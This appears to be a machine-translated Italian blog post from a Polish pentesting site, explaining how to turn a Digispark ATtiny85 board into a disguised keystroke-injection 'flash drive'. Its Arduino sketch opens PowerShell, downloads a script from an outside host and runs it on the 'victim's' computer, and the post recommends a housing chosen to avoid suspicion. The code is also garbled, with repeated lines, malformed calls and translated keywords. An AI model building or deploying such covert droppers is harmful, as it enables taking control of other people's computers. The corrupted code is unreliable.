"unità flash" programmabile o come prendere rapidamente il controllo del computer

Oggi, la voce è una forma di tutorial su come creare la propria chiavetta usb programmabile sulla falsariga del costoso e popolare Rubber Ducky di Hak5. Funzionerà sul principio di una tastiera – collegato al computer entra in una sequenza di tasti pre-programmata. Il primo passo è acquistare una scheda Arduino in miniatura basata sul microcontroller ATtiny85 – Digispark. Il più economico che puoi trovare dai nostri amici dalla Cina su uno dei siti di aste popolari. I prezzi partono da lì da $ 1 –Digispark Poiché ATtiny85 - Digispark a volte c'è un problema con il rilevamento di DigiSpark da parte di alcuni computer (in particolare le porte USB3), è meglio fare immediatamente scorta su un adattatore, che risolve questo problema (costo circa 2 $) –Adattatore Quando scheda USB l'apparecchiatura ordinata ci raggiunge abbiamo bisogno di programmare il suo ambiente, che sarà Adruino IDE –Arduino Tutorial collegamento ad esso Digisparka possiamo trovare qui –Schema Il nostro controller ha una quantità limitata di memoria, quindi il payload corretto potrebbe non adattarsi ad esso. Ho risolto questo problema mettendo su di esso un codice che scarica uno script con payload utilizzando un powershell, che a sua volta verrà poi eseguito sul computer della vittima:

#include "DigiKeyboard.h" void setup() { }

void loop() { DigiKeyboard.sendKeyStroke(0); DigiKeyboard.delay(500); DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT); DigiKeyboard.delay(500); DigiKeyboard.print("powershell"); DigiKeyboard.sendKeyStroke(500); DigiKeyboard.print("powershell"); DigiKeyboard.sendKeyStroke(500); DigiKeyboard.print("powershell"); DigiKeyboard.sendKeyStroke(500); DigiKeyboard.print("powershell"); DigiKeyboard.sendKeyStroke(500); DigiKeyboard.print("powershell"); DigiKeyboard.sendKeyStroke(500); DigiKeyboard.print;DigiKeyboard.sendKeyStroke(500); DigiKeyboard.print("powershell"); DigiKeyboard.digiKeyboard.print("powershell"); DigiKeyboard.sendKeyStroke(500); DigiKeyboard.print("powershell"); DigiKeyboard.sendKeyStroke(500); DigiKeyboard.KEY_ENTER); DigiKeyboard.delay(1 1000); DigiKeyboard.print("$client = new-object System.Net.WebClient"); DigiKeyboard.sendKeyStroke(KEY_ENTER); DigiKeyboard.delay(500); DigiKeyboard.print("$client. File Download("https://my127001.pl/script.ps1" , "script.ps1")"); DigiKeyboard.sendKeyStroke(KEY_ENTER); DigiKeyboard.delay(2000); DigiKeyboard.sendKeyStroke(0, MOD_GUI_LEFT | KEY_R); DigiKeyboard.delay(750); DigiKeyboard.print("powershell.exe -File script.ps1"); DigiKeyboard.sendKeyStroke(KEY_ENTER); per (;;) { /*vuoto*/ }

}

Per rendere ulteriormente più autoreferente l'aspetto della nostra pendriva, in modo che non susciti sospetti, vale la pena fare scorta su un alloggiamento stampato, ad esempio dal design sotto illink – Housing Il tutto assomiglia a questo e può assumere il controllo del computer della vittima in pochi secondi: "unità flash" programmabile

Chcesz wiedzieć więcej?

Zapisz się i bądź informowany o nowych postach (zero spamu!).
Dodatkowo otrzymasz, moją prywatną listę 15 najbardziej przydatnych narzędzi (wraz z krótkim opisem), których używam przy testach penetracyjnych.

Nigdy nie podam, nie wymienię ani nie sprzedam Twojego adresu e-mail. W każdej chwili możesz zrezygnować z subskrypcji.

Aggiungi ai preferiti : permalink.

Podziel się swoją opinią na temat artykułu